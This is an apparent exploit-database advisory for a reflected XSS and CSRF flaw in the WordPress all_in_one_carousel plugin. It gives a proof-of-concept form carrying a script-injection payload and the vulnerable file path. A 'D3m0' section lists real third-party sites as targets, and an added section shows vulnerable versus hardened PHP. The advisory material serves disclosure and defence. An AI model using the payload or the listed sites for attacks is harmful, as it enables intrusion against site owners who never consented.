Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln

2014-05-05T00:00:00
ID SECURITYVULNS:DOC:30684
Type securityvulns
Reporter Securityvulns
Modified 2014-05-05T00:00:00

Description

Exploit :

<html>
<head>
<title>Wordpress all_in_one_carousel Plugin Xss &amp; Csrf Vulnerability [IeDb TeaM]</title>
</head>
<body>
<center><b>Wordpress all_in_one_carousel Plugin Xss &amp; Csrf Vulnerability</b></center><br><br>
<!-- CSRF: the form posts to the target with no nonce or referer check; the "name" field carries the reflected XSS payload. The action is the advisory's placeholder. -->
<form action="http://YourTarget.Com" id="formid" method="post">
<input name="name" value='"><script>alert(/IeDb.ir/)</script>' /><br><br>
<input type="submit" value="Submit"/>
</form>
</body>
</html>

XSS Code : "><script>alert(/IeDb.ir/)</script>

Vulnerable Page :

Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
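The advisory shows the effect (a "name" value that closes the attribute and injects a script, submitted cross-site with no token) but not the plugin's source. The following is an added, hypothetical illustration written for this page, not the all_in_one_carousel plugin's own code: the reflected pattern the PoC relies on, beside a hardened handler using real WordPress APIs (check_admin_referer, wp_nonce_field, current_user_can, sanitize_text_field, esc_attr). The nonce action and field names "aioc_add_carousel" / "aioc_nonce" are assumptions.

```php
<?php
// Added illustration for this advisory; NOT the plugin's real source.
// Assumed pattern: the template reflects POST["name"] into an <input value="...">.

// --- Vulnerable pattern (what the  "><script>  payload exploits) ---
function render_name_field_vulnerable( array $post ) {
    $name = isset( $post['name'] ) ? $post['name'] : '';
    // Raw reflection: a value of  "><script>...</script>  closes the quoted
    // attribute and the tag, so the browser renders the injected element.
    return '<input name="name" value="' . $name . '" />';
}

// --- Hardened pattern ---
function handle_add_carousel_request( array $post ) {
    // CSRF: the request must carry a nonce WordPress issued for this action.
    // check_admin_referer() ends the request with a 403 page when the nonce
    // is missing or invalid. (Action/field names are assumptions.)
    check_admin_referer( 'aioc_add_carousel', 'aioc_nonce' );

    // Authorization: a management template must not be reachable by anyone
    // who can merely load the file path.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }

    // Input: wp_unslash() removes WordPress' added slashes, then
    // sanitize_text_field() strips tags, invalid UTF-8 and stray whitespace.
    $name = isset( $post['name'] )
        ? sanitize_text_field( wp_unslash( $post['name'] ) )
        : '';

    return render_name_field_hardened( $name );
}

function render_name_field_hardened( $name ) {
    // Output: esc_attr() encodes " ' < > & for the attribute context, so the
    // advisory's payload stays inside the quoted value instead of closing it.
    return '<input name="name" value="' . esc_attr( $name ) . '" />';
}

// The legitimate form must emit the matching nonce field so that only
// submissions originating from the logged-in admin page pass the check.
function render_add_carousel_form( $action_url ) {
    ob_start();
    ?>
    <form method="post" action="<?php echo esc_url( $action_url ); ?>">
        <?php wp_nonce_field( 'aioc_add_carousel', 'aioc_nonce' ); ?>
        <?php echo render_name_field_hardened( '' ); ?>
        <input type="submit" value="Submit" />
    </form>
    <?php
    return ob_get_clean();
}
```

With the hardened handler, the PoC form on this page fails at check_admin_referer() before any output is produced, and even a request that did carry a valid nonce would render the payload as inert text inside the attribute. The same two controls (nonce plus capability check, and context-appropriate output escaping) are the standard fix for this class of reflected-XSS-plus-CSRF bug in WordPress plugin templates.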

[+] Image : http://sectime.ir/myfiles/Xss-wp.png

D3m0 :

http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php
http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php

Gr33tz : All Members In IeDb.Ir/acc | Thanks : 8ThBit , Dr.3v1l And ....

Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04]